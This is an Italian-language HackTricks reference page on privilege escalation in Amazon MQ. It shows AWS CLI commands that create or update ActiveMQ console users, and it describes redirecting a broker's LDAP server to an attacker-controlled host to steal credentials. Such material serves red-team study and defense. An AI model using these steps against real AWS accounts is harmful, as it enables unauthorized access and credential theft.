AWS - MQ Privesc

Reading time: 3 minutes

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

MQ

Per ulteriori informazioni su MQ controlla:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Con questi permessi puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):

bash
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impatto Potenziale: Accesso a informazioni sensibili navigando attraverso ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Con questi permessi puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):

bash
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impatto Potenziale: Accesso a informazioni sensibili navigando attraverso ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Se un broker utilizza LDAP per l'autorizzazione con ActiveMQ. È possibile cambiare la configurazione del server LDAP utilizzato in uno controllato dall'attaccante. In questo modo l'attaccante sarà in grado di rubare tutte le credenziali inviate tramite LDAP.

bash
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Se in qualche modo riuscissi a trovare le credenziali originali utilizzate da ActiveMQ, potresti eseguire un MitM, rubare le credenziali, utilizzarle nel server originale e inviare la risposta (forse semplicemente riutilizzando le credenziali rubate potresti farlo).

Impatto Potenziale: Rubare le credenziali di ActiveMQ

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks